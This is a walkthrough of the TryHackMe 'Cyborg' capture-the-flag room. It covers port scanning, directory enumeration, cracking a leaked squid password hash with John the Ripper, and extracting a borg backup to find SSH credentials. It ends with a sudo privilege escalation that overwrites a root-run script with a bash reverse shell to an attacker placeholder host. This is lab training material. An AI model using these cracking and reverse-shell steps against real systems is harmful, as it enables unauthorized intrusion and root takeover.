Cyborg
Room Details
The TryHackMe Cyborg room covers:
Service Discovery
Web Content Discovery
Hash Cracking
Data Decompression
Privilege Escalation
Target
IP: 10.10.230.194
Service Discovery
Scan for open ports with nmap
$ nmap -sC -sV -A -sS -Pn -oN nmap.txt 10.10.230.194
Nmap scan report for 10.10.230.194
Host is up (0.44s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:b2:70:f3:07:ac:32:00:3f:81:b8:d0:3a:89:f3:65 (RSA)
| 256 68:e6:85:2f:69:65:5b:e7:c6:31:2c:8e:41:67:d7:ba (ECDSA)
|_ 256 56:2c:79:92:ca:23:c3:91:49:35:fa:dd:69:7c:ca:ab (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 993/tcp)
HOP RTT ADDRESS
1 279.37 ms 10.2.0.1
2 ... 3
4 514.99 ms 10.10.230.194
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Services Discovered
Service  Port  Version
HTTP     80    Apache 2.4.18
SSH      22    OpenSSH 7.2p2
OS: Ubuntu (from the service description)
This answers the first three questions of Task 2.
Web Content Discovery
Scan for directories using gobuster
gobuster dir -u http://10.10.230.194 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 40 --no-error -o web-dirs.txt
Directories Discovered
/admin - homepage; the archive dropdown links to an archive.tar file
/etc - squid proxy password and configuration files
Analyzing Directories
From /etc we found /etc/squid/passwd, which contains a password hash, and the squid config file /etc/squid/squid.conf
# reading files
# /etc/squid/passwd
music_archive:{REDACTED}
# /etc/squid/squid.conf
auth_param basic program /usr/lib64/squid/basic_ncsa_auth /etc/squid/passwd
auth_param basic children 5
auth_param basic realm Squid Basic Authentication
auth_param basic credentialsttl 2 hours
acl auth_users proxy_auth REQUIRED
http_access allow auth_users
Cracking Password Hash
Store the hash in a file named passwd_hash.txt
Crack the hash using John the Ripper
john passwd_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
squidward (music_archive)
We've successfully recovered the password from the hash
Analyzing the Tar File
Extract the tar file
tar -xvf archive.tar
Found a readme file which points us to the borg documentation page
We need to install borg to extract the files from the compressed archive format
Install borg
sudo apt install borgbackup -y
This is for Debian-based distributions; for other distributions refer to the borg installation documentation
Decompress the extracted files from archive.tar using borg
borg extract ./home/field/dev/final_archive::music_archive
After the files are decompressed successfully, the data turns out to be a home directory backup of alex's account
Found a password in /home/alex/Documents/note.txt
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down! alex:{REDACTED}
Login with ssh
Login using alex's credentials
ssh alex@10.10.230.194
alex@10.10.230.194's password: # enter password from note.txt
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-128-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

27 packages can be updated.
0 updates are security updates.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

alex@ubuntu:~$
We now have access to alex's account
Get User Flag
alex@ubuntu:~$ cat user.txt
flag{REDACTED}
Privilege Escalation
Check which commands alex may run with sudo
alex@ubuntu:~$ sudo -l
Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
We can run the file /etc/mp3backups/backup.sh with root privileges, so check whether the file is writable
alex@ubuntu:~$ ls -la /etc/mp3backups/backup.sh
-r-xr-xr-- 1 alex alex 1083 Dec 30  2020 /etc/mp3backups/backup.sh
The file is not writable, but it is owned by alex, so we can change its permissions using chmod
Allow all permissions on the file
alex@ubuntu:~$ chmod 777 /etc/mp3backups/backup.sh
Note: Allowing all users rwx permissions isn't good practice, but for ease I've granted those rights here
Overwrite the file with a bash reverse shell, as alex on the target machine
alex@ubuntu:~$ echo "bash -c 'exec bash -i &>/dev/tcp/ATTACKER_THM_IP/4444 <&1'" > /etc/mp3backups/backup.sh
The reverse shell will connect back to the attacker's machine on port 4444
Start a netcat listener on the attacker's machine
nc -nlvp 4444
Execute the script with sudo from the target machine
alex@ubuntu:~$ sudo /etc/mp3backups/backup.sh
Now we've successfully rooted the machine
$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [ATTACKER_THM_IP] from (UNKNOWN) [10.10.230.194] 36492
root@ubuntu:~#
Get Root Flag
root@ubuntu:~# cat root.txt
flag{REDACTED}